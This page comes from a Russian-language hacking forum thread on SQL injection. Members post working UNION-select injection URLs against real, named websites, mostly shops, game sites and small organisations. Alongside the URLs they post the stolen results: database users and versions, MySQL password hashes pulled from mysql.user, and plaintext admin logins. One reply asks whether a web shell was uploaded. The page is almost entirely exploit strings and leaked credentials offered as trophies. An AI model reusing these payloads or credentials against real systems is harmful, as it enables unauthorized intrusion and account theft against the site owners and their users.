ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 731 из 1242 « Первая < 231631681721 727 728 729 730 731 732 733 734 735 7417818311231 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7301  
Старый 02.01.2009, 01:11
kolenwal
Новичок
Регистрация: 13.12.2008
Сообщений: 7
Провел на форуме:
142595

Репутация: 25
По умолчанию
http://www.matica.com/play_game.php?gameID=-22+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--

5.0.67-community:agency23_alex@localhost:agency23_matica

В базе около 3000 юзеров,7 баз
Последний раз редактировалось kolenwal; 02.01.2009 в 01:49..
 
Ответить с цитированием

  #7302  
Старый 02.01.2009, 01:19
TOOZEГ
Banned
Регистрация: 31.12.2008
Сообщений: 1
Провел на форуме:
8442

Репутация: 5
По умолчанию
А ШЕЛЛ ЗОЛИЛ?
 
Ответить с цитированием

  #7303  
Старый 02.01.2009, 03:00
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию
Латвийская справочна служба.

http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,2,3/*

User: dba@
Version: 5.0.16-nt-max-log
Database: do

http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(user(),0 x41),0x41),3/*
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(version( ),0x41),0x41),3/*
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(database (),0x41),0x41),3/*

Далее знакомый сценарий - information_schema:

http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(table_na me,0x41),0x41),3+from/**/information_schema.tables/*

.. или mysql.user по умолчанию:

http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(user,0x4 1),0x41),3+from/**/mysql.user+limit+1,1/*
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(password ,0x41),0x41),3+from/**/mysql.user+limit+1,1/*
 
Ответить с цитированием

  #7304  
Старый 02.01.2009, 03:39
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию
Код:
http://www.domkino.spb.ru/description.php?id=-406+union+select+1,2,3,4,5,6,7,8,9,concat(user(),0x3a,version(),0x3a,database()),11,12--
domkinospbru@78.108.81.211:5.0.67:domkinospbru
Код:
http://www.domkino.spb.ru/description.php?id=-406+union+select+1,2,3,4,5,6,7,8,9,concat(login,0x3a,password),11,12+from+user--
shurik:ahin
PR:5
тИЦ: 475
Админку ненашёл=//
 
Ответить с цитированием

  #7305  
Старый 02.01.2009, 04:54
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
"OOO Румтехтранс"

Код:
http://www.kaolin-gob.kiev.ua/index.php?inc=docs&key=r&id=-1+union+select+1,version(),3,4,5,6,7,8--
"Webzavod - дизайн, разработка сайтов"

Код:
http://www.webzavod.com.ua/?mid=-1+union+select+1,2,3,4,5,6,7,version()--
На сайтах, в портофолио, так же есть инъекция.
Последний раз редактировалось R1dex; 02.01.2009 в 04:58..
 
Ответить с цитированием

  #7306  
Старый 02.01.2009, 06:50
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Такс начинаем создавать свои игры !!!

http://www.xgamestation.com/view_product.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a3a,version(),user(),database()),14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--

Version:5.0.27-community-nt
User:Administrator@localhost
Database:gamestation

http://www.xgamestation.com/view_product.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a3a,user,password),14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28+from+mysql.user--

root::*8FFA6C4A39732DF6BF13184E70BE8FAFC475656A
Administrator::*514CF3488C00733A185644DCC8DBB8BEE6 3B180F
gruvii::*BD2B2BB6A9881E0FE04B20ED719246D01071975D
xgamestation::*1BA76162951F45EE1C6CB19DD64B39325E0 93978
eric::*D2E840839C2168F0AB422575182CF92EFDF36C7B

http://www.b2cpowershop.com/tell_a_friend.php?goods_id=-1641+union+select+concat_ws(0x3a3a,version(),user( ),database())--

Version:5.0.22-community-max-nt
User:b2cbattery@216.10.246.71
Database:btwocp0wersh0per


http://www.compel.com.tr/Include/Modules/ProductDetail.php?CatID=22&ManID=21&ProID=-2893+union+select+concat_ws(0x3a3a,version(),user( ),database()),2,3,4,5,6,7--

Version:4.1.22-standard
User:compelc_iskender@localhost
Database:compelc_compel

http://www.mandeno.co.nz/print/print_item_details.php?itemid=-3883+union+select+1,2,concat_ws(0x3a3a,version(),u ser(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35--

Version:4.0.20-standard
User:mandeno@localhost
Database:mandenoshop


Australian Community Radio Podcasts!

http://www.cpod.org.au/page.php?id=-67+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8--

PR:5

Version:5.0.45-log
User:CBAA@localhost
Database:cbaa

Торговля книгами!

PR:6

http://www.lcoastpress.com/book.php?id=-33+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20--

Version:4.1.22
User:lcpdb@localhost
Database:lcpsite
Последний раз редактировалось spherics; 02.01.2009 в 07:41..
 
Ответить с цитированием

  #7307  
Старый 02.01.2009, 07:39
vladvk
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223

Репутация: 7
По умолчанию
Никто не хочет дальше покрутить:
http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+information_schema.tables--
Цитата:
1222:The used SELECT statements have a different number of columns select * from cikk where id=-316/**/union/**/select/**/table_name from information_schema.tables-- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 56Cikk // - Adatbázis hiba - 1054:Unknown column 'CHARACTER_SETS' in 'where clause' select * from menu where id=CHARACTER_SETS Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 91 - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 select * from menu where id= Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 91 - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and aktiv=1' at line 1 select count(*) from menu where fokategoria= and aktiv=1 Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/index.php on line 88
http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/version()--
Цитата:
1222:The used SELECT statements have a different number of columns select * from cikk where id=-316/**/union/**/select/**/version()-- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 56Cikk // - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.67' at line 1 select * from menu where id=5.0.67 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 91 - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 select * from menu where id= Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 91 - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and aktiv=1' at line 1 select count(*) from menu where fokategoria= and aktiv=1 Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/index.php on line 88
 
Ответить с цитированием

  #7308  
Старый 02.01.2009, 11:39
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию
Цитата:
Никто не хочет дальше покрутить:
Database:dcmagazin
Version: 5.0.67
User: dcmagazin@localhost

http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+information_schema.tables+limit+1, 1--

Но в целом смысла не имеет, так как:
http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+mysql.user--
SELECT command denied to user 'dcmagazin'@'localhost' for table 'user'
 
Ответить с цитированием

  #7309  
Старый 02.01.2009, 12:45
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию
http://www.lit-across-frontiers.org/projects_detail.php?id=1'+UNION+SELECT+1,concat_ws (0x3a3a,v ersion(),user(%20),database()),3,4 ,5,6/*

Version:5.0.45
User:laf@localhost
Database:laf

тИЦ 10
PR 6
 
Ответить с цитированием

  #7310  
Старый 02.01.2009, 19:38
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию
Код:
http://www.tekojoja.org.py/v1/news.php?id=-1+union+select+1,concat_ws(0x3a,name,pass,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13+from+user--
логин/пасс/юзер/версия/бд:
Код:
admin:admin:tekojoja_tekojoj@localhost:4.1.22-standard:tekojoja_bd
---------------------------------------------------------------
The End!
 
Ответить с цитированием
Ответ
Страница 731 из 1242 « Первая < 231631681721 727 728 729 730 731 732 733 734 735 7417818311231 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ